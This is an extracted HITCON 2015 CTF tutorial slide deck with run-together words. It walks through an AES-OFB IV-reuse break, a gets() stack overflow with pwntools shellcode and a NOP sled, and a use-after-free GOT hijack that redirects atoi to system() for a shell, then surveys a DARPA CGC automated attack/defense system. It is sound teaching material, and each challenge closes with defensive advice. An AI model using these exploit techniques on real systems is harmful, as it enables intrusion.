ctf hello,world!
TRANSCRIPT
![Page 1: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/1.jpg)
CTF:Hello,World!HITCON2015CTFConference
Dec5.– Dec6.,2015
1
黃世昆交通大學
Shih-KunHuang<[email protected]>
黃俊穎海洋大學
Chun-YingHuang<[email protected]>
![Page 2: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/2.jpg)
HowDoYouFeel?
2
![Page 3: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/3.jpg)
IfYouWerea…
Programmer Hacker Robot
除錯修補清理
找錯脅迫操控
符號運算、機器學習
CRS: 自動推論系統
CTF CGC
3
![Page 4: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/4.jpg)
Outline
• CTFandAIS3FinalCTF• CTFServerSetup• SimplePractices
• Crypto• Pwn1• Pwn3
• FromCTFtoCGC
4
![Page 5: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/5.jpg)
CTF
• TypeofCTFs• Jeopardy– Anytypeofproblems• AttackandDefense– Pwn +Patch• KingoftheHill– Pwn +Patch
• AIS3FinalCTF• Jeopardystyle• Misc,Binary,Pwn,Web,Crypto
5
![Page 6: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/6.jpg)
CTFServerSetup
• Realserver(Linuxx64)+QEMU
• TricksforsimpleCTF• x86 orx64• Disablestackprotector• Allowcodeexecution instack• DisableASLR
$ gcc -m32 -fno-stack-protector -z execstack \hello.c -o hello
6
![Page 7: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/7.jpg)
SimpleBufferOverflow
• OutdatedImplementation • Input"A"*20
7
int func1(int a, int b, int c) {char buffer[8]; // declare a character array of 8 bytesgets(buffer); // read user input stringreturn 0; // return zero
}
buffer[8]
0x00000000
0xffffffff
EBPret-addr
a
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
0x414141410x41414141
0x00000000
0xffffffff
0x414141410x414141410x41414141
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
![Page 8: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/8.jpg)
StackProtector
• WithStackProtector • Input"A"*20
8
buffer[8]
0x00000000
0xffffffff
EBP
ret-addra
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
Canary (?)
0x414141410x41414141
0x00000000
0xffffffff
0x41414141
0x41414141a
Stackgrow
sinthisway
bc
LastStack Frame
CurrentStackFrame
......
0x41414141
![Page 9: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/9.jpg)
CodeExecutioninStack
• Testifabinaryenablescodeexecutioninstack
• Enablecodeexecutioninstack(youmayneedthe'execstack'package)
9
$ execstack -c /path/to/myprog # disallow executable stack$ execstack -q /path/to/myprog- /path/to/myprog$ execstack -s /path/to/myprog # allow executable stack$ execstack -q /path/to/myprogX /path/to/myprog
$ readelf –l /path/to/myprog.set | grep –i stackGNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0x10$ readelf –l /path/to/myprog.clear | grep –i stackGNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10
![Page 10: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/10.jpg)
ASLR
• AddressSpacesLayoutRandomization• Randomizedaddressforheapandstack• DisableASLR
• Randomizedstackspaces
• Randomizedheapandstackspaces(Ubuntudefault)
10
echo 0 > /proc/sys/kernel/randomize_va_space
echo 1 > /proc/sys/kernel/randomize_va_space
echo 2 > /proc/sys/kernel/randomize_va_space
![Page 11: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/11.jpg)
ASLR(Cont’d)
• WithoutASLR(0) • WithASLR(1,2)
11
$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffffd3ac
m = 0x804b008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffffd3ac
m = 0x804b008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffffd3ac
m = 0x804b008
./a.outmain = 0x80484cdgets = 0x8048380buf = 0xffdf6d8c
m = 0x9b03008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xff86930c
m = 0x9b1e008$ ./a.outmain = 0x80484cdgets = 0x8048380buf = 0xfff9b4bc
m = 0x88f3008
char buf[64];printf("main = %p\n", main);printf("gets = %p\n", gets);printf(" buf = %p\n", buf);printf(" m = %p\n", malloc(16));
![Page 12: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/12.jpg)
Misc.Issue– xinetd
12
service gagb{
disable = notype = UNLISTEDid = gagbsocket_type = streamprotocol = tcpuser = gagbgroup = gagbwait = noserver = /home/gagb/gagbport = 9192
}
![Page 13: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/13.jpg)
Misc.Issues– BufferingMode
• stdin/stdoutbufferingmode• Linebuffered• Fullybuffered• Nobuffered
13
setvbuf(stdin, NULL, _IONBF, 0);setvbuf(stdout, NULL, _IONBF, 0);
![Page 14: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/14.jpg)
Misc.Issues– Permissions
• Disableaccessfor… • Firewallsetup• DefaultpolicyisDROP• Onlyallowrequiredincomingports
• Disallowoutgoingconnections
14
chmod 751 /chmod 751 /etcchmod 750 /sbinchmod 750 /usr/sbinchmod 551 /procchmod 551 /devchmod 711 /homechmod 1773 /tmp...cd $HOMEchown root:$OWNER . binary flagchmod 550 . binarychmod 440 flag
![Page 15: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/15.jpg)
SimplePractices
• AsimpleserverforCTF:Hello,World!• 1cryptoand2pwns (flag@/home/*/flag)• HITCONCTFOnly:AccessibleonDec5.andDec6.
15
http://54.xxx.yyy.zzz/fun.html
PLEASE,PLEASE,PLEASEDON’THACKOURMACHINE~>_<~
![Page 16: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/16.jpg)
SomeBackgrounds
• ProgrammingintheUNIX(Linux)environment• Alittlebitx86Assembly• Python• Pwntools• Patience
16
![Page 17: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/17.jpg)
Practice:Crypto– cry2Host:54.xxx.yyy.zzz Port:5566Hint:thesourcecodeOrigin:dada@nctu
17
![Page 18: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/18.jpg)
cry2– TheFirstImpression
18
![Page 19: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/19.jpg)
cry2– TheSourceCode
19
1: key = "XXXXXXXXXXXXXXXX”2: iv = ''.join(random.choice(string.hexdigits) for _ in range(16))3: flag = "ais3{NEVERPHDNEVERPHDNEVERPHD..}" # Not real flag ...4: 5: def encrypt(p):6: return AES.new(key, AES.MODE_OFB, iv).encrypt(p)
...
7: print encrypt(flag).encode("hex")
8: while True:...
9: p = ''.join(random.choice(string.lowercase) for _ in range(32))10: print encrypt(p).encode("hex")
![Page 20: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/20.jpg)
cry2–OutputFeedback(OFB)Mode
20
BlockCipherEncryption(AES)
InitialVector(IV)
Ciphertext
Plaintext
Key BlockCipherEncryption(AES)
Ciphertext
Plaintext
Key BlockCipherEncryption(AES)
Ciphertext
Plaintext
Key
![Page 21: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/21.jpg)
BlockCipherEncryption(AES)
InitialVector(IV)
Ciphertext
Plaintext
Key
cry2– MisuseofOFBMode
21
32-bytestringsofloweralphabets
Ciphertextsoutputfrom
cry2
XOR-pad:a32-bytestring
![Page 22: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/22.jpg)
cry2– Solution:CollectingCiphers
22
9c5a8d2fb81dea8361493cc360865d7b7e8dcf342d8f17774af46a0332cc1e969c5f8668b630cbb1526f19ec5eba705d5db9ee1601a6395b78d351271390409189509274a62bc5b25e741bec55b86f5548b0fd0901a334587ed655390484449f9057897db938cba5406b00e44ca9725d5dbee50410a9345177cf4c2a1884578e9b409578a926dfba507801ef42aa755d4ab2fd110db533557fde4f26079444808e549973aa30d5b74d7915ec40b17e4b4cb2ed121aa228487dc35d21108d4780924a947bbb32deb2437e1ef148b07b424cb1f21e1da73e4569c9422e1a8a5581855c9877a03cc8b14b6b1cf945a6684f5cb4f5141db136556dc94d2112815d9190459a64a73bcbb345760afe4cb26f5f4dabfc100da430436dcb5939138c42808a5f966ea537daa1407509e54fa4715756aef81b1fa7244b6cd5582610834a809a51957db920c4b6506315e453bd7e4a57a5ee1b18b330457ec1503a078f5b98...9b558a66b337dcb45d6d0fe457a5705752aaf4170fac345b62c74b3c1b874a9e9b40966ba021dca3556b02fe50b068444ea9e81018b323447bc34a29008356999354946aa820c4b049631bfa5dab69434da6f0051aa73f4b66ce4b2715864784
Thisiswhatwereallywanttodecode
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
![Page 23: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/23.jpg)
cry2– UsePwntools
• Pwntools• AgoodCTFframeworkimplemented inpython• https://github.com/Gallopsled/pwntools
• QuickInstallationGuide(Ubuntu)
23
$ sudo apt-get install binutils python-dev python-pip $ sudo pip install pwntools
![Page 24: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/24.jpg)
cry2– EnumerateAllCiphertexts
24
1: #!/usr/bin/env python2: from pwn import *3:4: #r = remote('54.xxx.yyy.zzz', 5566)5: r = process("./src.py")6: ciphers = []6:7: while len(ciphers) < 100:8: s = r.recvline().strip()9: if len(s) == 64:10: ciphers.append(s)11: r.send('\n')
![Page 25: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/25.jpg)
cry2– Pseudocodes toObtaintheXOR-Pad
25
Given c: The list containing n ciphertexts (except the first one)c = [ c1, c2, c3, …, cn ]
Suppose cu,v represents the vth byte in ciphertext cu, 1 ≤ u ≤ n
pad = "";for v = 1 to 32:
for x = 0 to 255:if x XOR cu,v is a lowercase alphabet for all u in [1, n]pad = pad + xbreak
use pad to decrypt the real ciphertext and obtain the flag
![Page 26: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/26.jpg)
cry2– SecurityPractice
• Correctuseofciphermodes• MustbeinitializedwithdifferentIVs
26
![Page 27: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/27.jpg)
Practice:Pwn1– gagbHost:54.xxx.yyy.zzz Port:9192Hint:thebinaryOrigin:chun-ying
27
![Page 28: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/28.jpg)
gagb – TheFirstImpression
28
![Page 29: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/29.jpg)
gagb – Let’sLookattheBinary(IDAPro)
29
![Page 30: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/30.jpg)
gagb – Let’sLookattheBinary(IDAPro– PseudocodeView)
30
![Page 31: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/31.jpg)
gagb – TheProblem
31
![Page 32: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/32.jpg)
gagb – Solution
• Eh…Wehavetoguessthenumberfirst!!• Strategy#1:Playwiththegame
• Pwntools:recv,send…tryallpossiblecombinations
• Strategy#2:Usetherandomnumbertrick• Rememberwehave:srand(time(0)) + rand()?• Inpython,wecando:
32
1: from ctypes import *2: cdll.LoadLibrary("libc.so.6")3: libc = CDLL("libc.so.6")4: libc.srand(libc.time(0))5: print libc.rand();
![Page 33: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/33.jpg)
gagb – ATrickySolution
33
1: r = process("./gagb"); # this is from pwntools …
2: num = ""3: while len(num) < 4:4: while True:5: d = chr(libc.rand() % 10 + 48)6: if len(set(num + d)) == len(num + d):7: num = num + d8: break
9: print r.recv()10: print num11: r.send(num + '\n')12: print r.recv()
• Use ntpdate tosynchronizeyoursystemclock• Youmayneedtouncheck"HardwareClockinUTCTime"ifyouareplaying
withVirtualBox orothervirtualmachines…
![Page 34: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/34.jpg)
gagb – TheOverflowPart:Strategy#1• Theoldtricks• Youhavetoguess thestackaddress• Fill"A"*28+addr +NOP*n+shellcode
34
context(arch = 'i386', os = 'linux')...shell = asm(shellcraft.sh())r.send('A'*28 + p32(0xffffdd70) + "\x90" * 400 + shell + "\n")r.interactive()
![Page 35: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/35.jpg)
gagb – TheOverflowPart:Strategy#1(Cont’d)
35
0x4141...41
0x00000000
0xffffffff
0x41414141Jump to stack
Stackgrow
sinthisway
......
0x90909090......
0x90909090
shellcode
s[24]
0x00000000
0xffffffff
EBPret-addr
Stackgrow
sinthisway
LastStack Frame
CurrentStackFrame
......
![Page 36: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/36.jpg)
gagb – TheOverflowPart:Strategy#2(1/3)• WewouldnotliketoguessanymoreL• Ask'gets()'todosomethingforus• Rememberthat'gets()'requiresonearguments–theaddresstostoretheuserinputstring
36
![Page 37: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/37.jpg)
gagb – TheOverflowPart:Strategy#2(2/3)• Wewantthestacktolookslike…
37
s[24]
0x00000000
0xffffffff
EBPaddr of gets()
Stackgrow
sinthisway
......
ret-addrargument #1
returnaddraftergets()addressforgets()tofill
garbage
![Page 38: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/38.jpg)
gagb – TheOverflowPart:Strategy#2(3/3)
• gets@plt canbeobtainedusingobjdump -d gagb
• Aftergets()finished,theprogramjumpstothebufferthatwehavefilledtheshellcode
38
r.send('A'*28 + p32(0x08048430) # gets@plt+ p32(0x0804a034) + p32(0x0804a034) # any writable address+ p32(0x12345678) * 100 + "\n") # garbage
r.send(shell + "\n") # fill gets() bufferr.interactive()
08048430 <gets@plt>:8048430: ff 25 0c a0 04 08 jmp *0x804a00c ; in GOT table8048436: 68 00 00 00 00 push $0x0804843b: e9 e0 ff ff ff jmp 8048420 <gets@plt-0x10>
![Page 39: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/39.jpg)
gagb – SecurityPractice
• Nomoregets()• Use/dev/urandomor/dev/random• Or,alternatively,atleastdo
39
srand(time(0) ^ getpid());
![Page 40: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/40.jpg)
Practice:Pwn3– phddbHost:54.xxx.yyy.zzz Port:3333Hint:thebinary,andthesystemClibraryOrigin:angelboy @ncu
40
![Page 41: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/41.jpg)
phddb – TheFirstImpression
41
![Page 42: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/42.jpg)
phddb – Let’sLookattheBinary(Assembly)
42Wehavesymbols
![Page 43: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/43.jpg)
phddb – Let’sLookattheBinary(Pseudocode)
43
![Page 44: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/44.jpg)
phddb – FeatureSummary
• Datastoredinheap – usemalloc()• dump• add
• Allocateheader first(32bytes)• Allocatethesis-textaccordingtothegivenlength
• edit• Modifyheadercontent• Reallocatethesis-textifnecessary
• remove
44
thesistext...
thesistext...
......
0x00000000
0xffffffff
name[20]age
length*thesis
name[20]age
length*thesis
Record#0Record#1
![Page 45: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/45.jpg)
phddb – TheProblem:editphd()
45
realloc(ptr,0)==free(ptr)!?
![Page 46: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/46.jpg)
phddb – Solution(1/6)
46
1.Addtworecords 2.Editrecords#0 3.Addonemorerecord
thesistext...
thesistext...
......
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
thesistext...
freed
......
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
thesistext...
thesistext...
...
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
name (ccc)age
length (32)*thesis
Record#2Record#2
![Page 47: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/47.jpg)
phddb – Solution(2/6)
• Wewanttoknowtherealaddressofatoi inmemory
• WecanthenknowtheClibrarybase• Realaddressofatoi minusatoi’s offsetinClibrary• Useobjdump -d libc.so.6 togetatoi’s offset
• Fromobjdump -d phddb,wegottheGOTentryaddressforatoi is0x804b03c
47
08048560 <atoi@plt>:8048560: ff 25 3c b0 04 08 jmp *0x804b03c8048566: 68 60 00 00 00 push $0x60804856b: e9 20 ff ff ff jmp 8048490 <_init+0x30>
![Page 48: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/48.jpg)
phddb – Solution(3/6)
• Editrecord#0• Fillthesistextusing:
• "A"*24• 0x20(length)• 0x804b03c
• GOTentryisafunctionpointertotherealaddressofafunction(in.so)
• Dumprecord#2• Revealatoi(?)
48
atoi (?)c99_scanf
......
GOT
0x804b03c0x804b038
0x804b040
thesistext...
thesistext......
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
name (ccc)age
length (32)*thesis
Record#2Record#2
![Page 49: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/49.jpg)
phddb – Solution(4/6)
• Theatoi’s realaddressisrightafterthethirdcolon':'(0x3a)
• Note:It’slittleendian49
6e 61 6d 65 3a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 0a 61 67 65 3a 31 30 39 34 37 39 35 35 38 35 0a 74 68 65 73 69 73 3a 0a 60 95 e5 f7 0a 7c 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 50 48 44 64 62 20 4d 65 6e 75
![Page 50: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/50.jpg)
phddb – Solution(5/6)
• Recallthatthemainfunctiondoesread()+atoi()• Wecanreplaceatoi’s GOTentryvaluetoanyfunctionwewanttocall
• Replaceatoi’s GOTentryvaluewiththerealaddressofsystem(),andthensend'sh\n'
• Simplearithmetic• atoi‘s realaddress=0xf7e59560• atoi offsetinClibrary=0x31560• systemoffsetinClibrary=0x3fcd0• system’srealaddress=0xf7e59560 – 0x31560 +0x3fcd0
=0xf7e67cd0
50
![Page 51: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/51.jpg)
phddb – Solution(6/6)
• Editrecord#0• Fillthesistextusing:
• "A"*24• 0x20(length)• 0xf7e67cd0
• read()+atoi()nowbecomesread()+system()
• Send'sh\n'
51
atoi (0xf7e59560)c99_scanf
......
GOT
0x804b03c0x804b038
0x804b040
thesistext...
thesistext...
...
0x00000000
0xffffffff
name (aaa)age
length (32)*thesis
name (bbb)age
length (32)*thesis
Record#0Record#1
name (ccc)age
length (32)*thesis
Record#2Record#2
system (0xf7e67cd0)
![Page 52: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/52.jpg)
phddb – SecurityPractice
• GOThijacking• Neveruse-after-free• Specialcaseofrealloc(ptr,size)
52
![Page 53: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/53.jpg)
FromCTFtoCGC從工人智慧搶旗
到
人工智慧自動攻防
53
![Page 54: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/54.jpg)
SecurityisBugs.FromLinusTorvalds
54
![Page 55: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/55.jpg)
FromCTFtoCGC
• TheCyberWar• CyberArmy
• CaptureTheFlag(CTF)• Informationsecuritycompetition
• CyberGrandChallenge(CGC)• All-computerCTFtournament• HeldbyDARPAofUSDoDwiththeDEFCONConferenceinLasVegasin2016
55
![Page 56: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/56.jpg)
Objective
• BuildaCyberReasoningSystem(CRS)• FollowCGCrules• Automaticattackanddefense
• AutomaticAttack• Analyzetheprogrambinarytofindthefailure• Generateexploit• Payloadtobypassmitigation
• AutomaticDefense
• Analyzetheprogramtofindthefault
• Findthefaultypoint
• Patchthefaultinbinarylevel
56
![Page 57: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/57.jpg)
Pre-Exploitation
Peri-Exploitation
End-Exploitation
Post-Exploitation
securityauditingtools(nessus,metasploit,sqlmap) developerbugforensictools
SoftwareExploitationFramework
![Page 58: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/58.jpg)
CRSIntegrationforCGC- Attack
● Target-awareSymbolicFuzzing● AutomaticExploit Generation● Anti-MitigationPayload
Generation● PostExploitationIntegration
Fuzzer
測、脅、隱、控
![Page 59: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/59.jpg)
CRSIntegrationforCGC- Defense
● FaultLocalization(path)● DataSlicing(data)● PatchingSiteIsolation
測、修、補、清
![Page 60: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/60.jpg)
AutomaticAttack
60
![Page 61: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/61.jpg)
Integration
● AutomaticExploit Generation(CRAX)
● PostExploitationFramework(Metasploit)
![Page 62: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/62.jpg)
Integration- CRAX
![Page 63: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/63.jpg)
Integration- CRAXwithROP
![Page 64: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/64.jpg)
Result – Compare with ROPgadget
• ROPgadget:Commonopensourcesearchandchaingadgetstool
ToolCompare
ExploitStrengthening ROPgadget
Gadget Type Long/ShortGadgets ShortGadgets
PayloadType TuringcompleteROP PayloadAPI Onetypepayload
Integrate CRAX+Metasploit
![Page 65: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/65.jpg)
Result – Compare with ROPgadget
• Payloadtype:exevc(“/bin/sh”)
Program Name
Program Size
Exploit Strengthening ROPgadgetTotal
Gadgets Time GeneratePayload Time Generate
Payloadgdb 7.7.1 4.9M 133K 36.2s True 278s True
nautilus 3.10.1 1.4M 58K 13.9s True -- Falsegpg 1.4.16 971K 25K 5.5s True 17.1s Truevim.tiny 7.4 806K 25K 5.0s True -- Falselshw b.02.16 755K 8K 2.4s True -- False
gcc 4.8 700K 4K 2.9s True 10.7s Trueobjdump 2.24 333K 8K 1.4s True -- Falsereadom 1.1.11 180K 4.9K 0.9s True -- False
curl 7.35.0 149K 2.9K 0.7s True -- Falsefactor 8.21 104K 2.3K 0.5s True -- False
![Page 66: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/66.jpg)
Result – with Different Program Size
● Fortyprogramsin/usr/bin,sizebetween100KBand5MB.
![Page 67: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/67.jpg)
AutomaticDefense
67
![Page 68: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/68.jpg)
Method- CRSArchitecture
68
![Page 69: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/69.jpg)
Method- Dstaralgorithm
• CF:Covered&Failed
• CS:Covered&Successful
• UF:Uncovered&Failed
• US:Uncovered&Successful
• Calculatetherankingfromtheformula:!"#
$"%!&
69
![Page 70: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/70.jpg)
Method- DynamicSlicing
• Anentireprogramtree→apath
• Weneedmoreinformationforpatching
70
![Page 71: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/71.jpg)
Method- DynamicSlicing
71
![Page 72: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/72.jpg)
Method- Patching
• AccordingtotheCGCrule,CRSmustpatchthebinaryprogramwithoutsourcecode
• Therearedifferenttrickstopatchdifferentfaults
• Wemustanalyzethetypeoffaultbeforepatchingit• OurCRSistargetedatstack-basedbufferoverflow
72
![Page 73: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/73.jpg)
Evaluation
• 24 challenge binaries (CB) for testing
• The fault of types include :
• CWE-121: Stack-based Buffer Overflow
• CWE-122: Heap based Buffer Overflow
• CWE-787: Out-of-bounds Write
• CWE-476: NULL Pointer Dereference
• ….• We choose the stack-based overflow CBs to evaluate our CRS.
73
![Page 74: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/74.jpg)
Evaluation- Summary
Challenge id Faulttype Method1 Method2Availability Security Availability Security
CADET_00001 2 Success Success Success Success
CROMU_00007 3 Failed Success Failed Failed
KPRCA_00001 1 Failed Failed Success Success
LUNGE_00005 3 Failed Failed Success Success
NRFIN_00003 2 Success Success Failed Failed
74
![Page 75: Ctf hello,world!](https://reader034.vdocuments.net/reader034/viewer/2022052302/587a71e91a28ab8a2a8b8043/html5/thumbnails/75.jpg)
Evaluation- preliminaryScoredEvent
Challenge id Availability Security Both Total
CADET_00001 72 44 37 80
CROMU_00007 20 12 9 25
KPRCA_00001 126 121 116 139
LUNGE_00005 61 33 27 70
NRFIN_00003 58 24 9 79
75
